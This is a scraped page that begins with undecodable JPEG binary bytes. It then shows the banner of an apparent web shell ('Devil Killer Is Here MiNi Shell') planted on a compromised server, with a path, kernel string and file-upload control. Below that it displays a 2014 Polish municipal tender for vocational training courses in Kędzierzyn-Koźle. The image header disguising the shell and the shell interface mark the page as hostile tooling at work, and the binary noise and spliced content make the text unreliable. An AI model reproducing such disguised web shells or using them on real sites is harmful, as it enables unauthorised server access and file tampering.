JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140701/219214-N-2014.html

<p class="kh_header"><b>Kędzierzyn-Koźle: Świadczenie usług szkoleniowych w zakresie organizacji i przeprowadzenia kursów: część 1-nowoczesny sprzedawca w handlu detalicznym i hurtowym; część 2- opiekun osób starszych, chorych lub niepełnosprawnych połączony z pierwszą pomocą; część 3-kucharz małej gastronomi; część 4-operator koparkoładowarki, część 5-magazynier - operator wózków jezdniowych z wymianą butli gazowej; część 6-księgowość, kadry, płace i archiwum dla uczestników projektu Program aktywizacji społeczno - zawodowej bezrobotnych Nowe Szanse realizowanego przez MOPS w Kędzierzynie - K.</b><br>
<b>Numer ogłoszenia: 219214 - 2014; data zamieszczenia: 01.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Reja 2A, 47-220 Kędzierzyn-Koźle, woj. opolskie, tel. 077 4835949, faks 077 4835949.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops-kkozle.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług szkoleniowych w zakresie organizacji i przeprowadzenia kursów: część 1-nowoczesny sprzedawca w handlu detalicznym i hurtowym; część 2- opiekun osób starszych, chorych lub niepełnosprawnych połączony z pierwszą pomocą; część 3-kucharz małej gastronomi; część 4-operator koparkoładowarki, część 5-magazynier - operator wózków jezdniowych z wymianą butli gazowej; część 6-księgowość, kadry, płace i archiwum dla uczestników projektu Program aktywizacji społeczno - zawodowej bezrobotnych Nowe Szanse realizowanego przez MOPS w Kędzierzynie - K..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usług szkoleniowych w zakresie organizacji i przeprowadzenia kursów: 
część 1 -nowoczesny sprzedawca w handlu detalicznym i hurtowym - nie mniej niż -5 osób; termin realizacji - sierpień 2014.Wymagana minimalna ilość godzin: 80 godzin;
część 2 - opiekun osób starszych, chorych lub niepełnosprawnych połączony z pierwszą pomocą - nie mniej niż - 6 osób; termin realizacji - rozpoczęcie lipiec 2014.
Wymagana minimalna ilość godzin: 120 godzin (w tym 80 godzin zajęć praktycznych, 40 godzin zajęcia teoretyczne).
część 3 - kucharz małej gastronomi - nie mniej niż - 3 osoby; termin realizacji - sierpień 2014. Wymagana minimalna ilość godzin:110 godzin (w tym 40h wykładowych i 70h zajęcia praktyczne).
część 4 - operator koparkoładowarki - nie mniej niż - 2 osoby; termin realizacji do 30 listopada 2014. Wymagana minimalna ilość godzin: 116 godzin część teoretyczna, 60 godzin praktyka oraz 26 godzin stażu wstępnego.
część 5 - magazynier - operator wózków jezdniowych z wymianą butli gazowej - nie mniej niż - 10 osób; termin realizacji - rozpoczęcie lipiec 2014. Wymagana minimalna ilość godzin: łączna liczba godzin 121 (dydaktycznych, praktycznych i egzaminacyjnych) szkolenie dla części operator wózków jezdniowych wynosi 81 godz. zegarowych oraz 40 godz. dla części magazynier). 
część 6 - księgowość, kadry, płace i archiwum - nie mniej niż - 4 osoby; termin realizacji - wrzesień 2014. Wymagana minimalna ilość godzin: 80 godzin..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.40.00.00-8, 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wpisu do rejestru instytucji szkoleniowych wydany przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej. Dotyczy zarówno w przypadku oferty na wykonanie całego zadania jak i oferty na wykonanie poszczególnych jego części.
W przypadku ofert wspólnych, wszyscy wykonawcy występujący wspólnie muszą spełniać powyższy warunek.
Zamawiający będzie oceniał powyższy warunek na podstawie złożonych dokumentów potwierdzających spełnienie warunku. Ocena dokonana będzie systemem spełnia/nie spełnia. Dopuszcza się wydruk ze strony internetowej właściwego miejscowo WUP.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie w okresie ostatnich 3 lat tj. od 30-06-2011 do 30-06-2014 a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - usług (dla świadczeń okresowych lub ciągłych również wykonywanych) o charakterze: 
wykonanie 3 kursów w zakresie jakiego dotyczy składana oferta z potwierdzeniem ich należytego wykonania. Jeżeli Wykonawca składa ofertę na więcej niż jedną część to również należy wykazać wykonanie 3 kursów z każdej części.
W przypadku ofert wspólnych, doświadczenie podlega sumowaniu. Warunkiem koniecznym jest, aby suma doświadczenia wynosiła minimum 100% doświadczenia wymaganego przez SIWZ. Warunek ten jest spełniony również, jeżeli jeden z wykonawców posiada 100% wymaganego doświadczenia.
Zamawiający będzie oceniał powyższy warunek na podstawie złożonych dokumentów potwierdzających spełnienie warunku. Ocena dokonana będzie systemem spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie niezbędnymi do wykonania zamówienia narzędziami i urządzeniami, jak niżej: 
- dysponowanie salą wykładową na  minimum 15 osób (Wykonawca musi podać gdzie się sala znajduje dokładny adres) - dotyczy wszystkich części
- pisemna zgoda na przeprowadzenie zajęć praktycznych - dotyczy części 2 i 3
- dysponowanie kasami fiskalnymi  - dotyczy części 1 i 5
- dysponowanie fantomem - dotyczy części 2
-dysponowanie, co najmniej 10 komputerami stacjonarnymi lub przenośnymi z monitorem z legalnym oprogramowaniem systemowym, jednakowym dla wszystkich uczestników, z dostępem do Internetu - dotyczy części 1, 5 i 6
- dysponowanie własnym parkiem maszynowym - dotyczy części 4 i 5 
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
Zamawiający będzie oceniał powyższy warunek na podstawie złożonych dokumentów potwierdzających spełnienie warunku. Ocena dokonana będzie systemem spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie uprawnień przez osoby wymienione w warunku >>Posiadanie wiedzy i doświadczenia oraz dysponowanie odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia<<.
Zamawiający będzie oceniał powyższy warunek na podstawie złożonych dokumentów potwierdzających spełnienie warunku. Ocena dokonana będzie systemem spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie opłaconego ubezpieczenia od odpowiedzialności cywilnej prowadzonej działalności gospodarczej na kwotę sumy ubezpieczenia nie mniejszą niż 50 000,- zł. i ważnego, co najmniej przez cały okres związania ofertą. Dotyczy zarówno w przypadku oferty na wykonanie całego zadania jak i oferty na wykonanie poszczególnych jego części.
W dokumencie ubezpieczeniowym musi być uwidoczniony jednoznaczny zapis, że jest to ubezpieczenie od prowadzonej działalności gospodarczej z jednoczesną informacją o opłaceniu składki ubezpieczenia (zapis w dokumencie, kopia przelewu lub inny dokument potwierdzający opłacenie).
W przypadku Wykonawców występujących wspólnie wartości polis ubezpieczeniowych odpowiedzialności cywilnej od prowadzonej działalności gospodarczej podlegają sumowaniu. Wymaga się, aby każdy z Wykonawców występujących wspólnie posiadał pełną polisę ubezpieczeniową wymaganą w SIWZ
Zamawiający będzie oceniał powyższy warunek na podstawie złożonych dokumentów potwierdzających spełnienie warunku. Ocena dokonana będzie systemem spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty - ściśle według załączonego wzoru</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops-kkozle.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskim Ośrodku Pomocy Społecznej w Kędzierzynie-Koźlu ul. Reja 2a 47-220 Kędzierzyn - Koźle (I piętro - sekretariat).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2014 godzina 09:00, miejsce: Miejskim Ośrodku Pomocy Społecznej w Kędzierzynie-Koźlu ul. Reja 2a 47-220 Kędzierzyn - Koźle (I piętro - sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program aktywizacji społeczno - zawodowej bezrobotnych Nowe Szanse współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki priorytet VII, działanie 7.1 poddziałanie7.1.1..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> nowoczesny sprzedawca w handlu detalicznym i hurtowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagana minimalna ilość godzin: 80 godzin

Celem szkolenia jest zdobycie niezbędnej wiedzy teoretycznej, a przede wszystkim praktycznych umiejętności potrzebnych do pracy na stanowisku handlowym.

 Program szkolenia winien obejmować w szczególności: 
- techniki sprzedaży, 
- marketing i reklama w handlu, 
- zasady tworzenia ekspozycji, 
- obsługę kasy fiskalnej - zajęcia praktyczne, 
- obsługę terminala kart płatniczych, 
- minimum sanitarne, 
- BHP na stanowisku pracy, 
- program do fakturowania, 
- rozmowy z Klientem,
- sprawnego i bezproblemowego przeprowadzania całego procesu sprzedaży,
- przyjmowania reklamacji lub zwrotu,
- rozliczania utargu,
- przyjmowania, wydawania lub zwrotu towaru na magazyn,
- przeprowadzania inwentaryzacji.
Wykonawca zapewnia sprzęt oraz materiały dydaktyczne: Zamawiający wymaga co najmniej 5 sztuk kas fiskalnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> opiekun osób starszych, chorych lub niepełnosprawnych połączony z pierwszą pomocą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagana minimalna ilość godzin: 120 godzin (w tym 80 godzin zajęć praktycznych, 40 godzin zajęcia teoretyczne).

Szkolenie ma na celu przygotowanie do pracy z osobami samotnymi i schorowanymi, które nie są w stanie samodzielnie zadbać o własne gospodarstwo domowe lub/ i spełniać podstawowe funkcje życiowe.

Tematyka jaką należy uwzględnić w programie szkolenia:
- bezpieczeństwo i higiena pracy w zawodzie opiekuna,
- psychologiczne i pedagogiczne aspekty opieki nad osobą starszą, chorą i niepełnosprawną,
- anatomia i fizjologia człowieka,
- dolegliwości wieku starczego,
- pielęgnacja osób w podeszłym wieku, chorych i niepełnosprawnych,
- pierwsza pomoc w nagłych wypadkach,
- choroby psychoorganiczne w okresie starczym,
- higiena żywienia - diety,
- zagadnienia higieny osobistej - pielęgnowanie chorego w domu,
- metodyka organizacji czasu wolnego,
- zajęcia praktyczne w Domu Pomocy Społecznej lub placówce całodobowej.
Badania lekarskie: jednostka zobowiązuje się przed rozpoczęciem szkolenia skierować bezrobotnych na odpowiednie badania lekarskie przeprowadzone przez lekarza medycyny pracy stwierdzające zdolność do uczestnictwa w szkoleniu i pracy w zawodzie kucharza oraz uprawniające kursantów do kontaktu z żywnością. Badania mają odbywać się na terenie miasta Kędzierzyna - Koźla, a koszt tych badań musi być ujęty w koszcie szkolenia.
Wykonawca zapewnia sprzęt oraz materiały dydaktyczne: niezbędne ubranie ochronne - fartuch /nowy zgodnie z wymiarami kursantów/..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 20.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> kucharz małej gastronomi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagana minimalna ilość godzin:110 godzin (w tym 40h wykładowych i 70h zajęcia praktyczne).
Celem szkolenia jest nabycie wiedzy teoretycznej i umiejętności praktycznych z zakresu:
1. Dobra Praktyka Higieniczna i Produkcyjna - 5 godz.
2. Obsługa maszyn i urządzeń - 5 godz.
3. Sporządzenie potraw z warzyw - 10 godz.
4. Sporządzenie potraw z jaj i przetworów mleczarskich - 15 godz.
5. Sporządzanie zup - 15 godz.
6. Sporządzanie potraw mącznych - 15 godz.
7. Ciasta ziemniaczane - 5 godz.
8. Zastosowanie potraw jarskich i półmięsnych w gastronomii - 10 godz.
9. Potrawy z drobiu - 10 godz.
10. Potrawy z ryb - 10 godz.
11. Sporządzanie przekąsek zimnych i gorących - 10 godz.
Badania lekarskie: jednostka zobowiązuje się przed rozpoczęciem szkolenia skierować bezrobotnych na odpowiednie badania lekarskie przeprowadzone przez lekarza medycyny pracy stwierdzające zdolność do uczestnictwa w szkoleniu i pracy w zawodzie kucharza oraz uprawniające kursantów do kontaktu z żywnością. Badania mają odbywać się na terenie miasta Kędzierzyna - Koźla, a koszt tych badań musi być ujęty w koszcie szkolenia.
Wykonawca zapewnia sprzęt oraz materiały dydaktyczne: niezbędne ubranie ochronne - fartuch /nowy zgodnie z wymiarami kursantów/..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> operator koparkoładowarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagana minimalna ilość godzin: 116 godzin część teoretyczna, 60 godzin praktyka oraz 26 godzin stażu wstępnego.
Szkolenie ma na celu uzyskanie uprawnień do obsługi  koparko - ładowarek.
Tematyka jaką należy uwzględnić w programie szkolenia:
- użytkowanie eksploatacyjne,
- dokumentacja techniczna,
- BHP przy obsłudze koparek-ładowarek, spycharek,
- podstawy elektrotechniki,
- silniki spalinowe,
- elementy hydrauliki,
- budowa koparek  - ładowarek, spycharek,
- technologia robót,
- zajęcia praktyczne
Kurs musi się kończyć egzaminem przed komisją IMBiGS. Wydane uprawnienia powinny być ważne bezterminowo.
Wymogi kwalifikacyjne, tryb szkolenia oraz zasady przyznawania tytułu OPERATORA MASZYN CIĘŻKICH w określonych specjalnościach i klasach uprawnień reguluje:
ROZPORZĄDZENIE Ministra Gospodarki z dnia 20.09.2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych /Dz. U. 118/1263/2001/
Program szkolenia musi posiadać akredytację przyznaną przez Kuratorium Oświaty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> magazynier - operator wózków jezdniowych z wymianą butli gazowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagana minimalna ilość godzin: łączna liczba godzin 121 (dydaktycznych, praktycznych i egzaminacyjnych) szkolenie dla części operator wózków jezdniowych wynosi 81 godz. zegarowych oraz 40 godz. dla części magazynier). 
Szkolenie ma na celu uzyskanie uprawnień do kierowania wózkami jezdniowymi z napędem silnikowym.

Tematyka jaką należy uwzględnić w programie szkolenia:
Moduł I: magazynier
a) kasa fiskalna - 16h
b)HACCAP - 8h
c)program SUBIEKT - 16h
Moduł II: operator wózków jezdniowych z napędem silnikowym następujących typów:
a) naładowne
b) unoszące
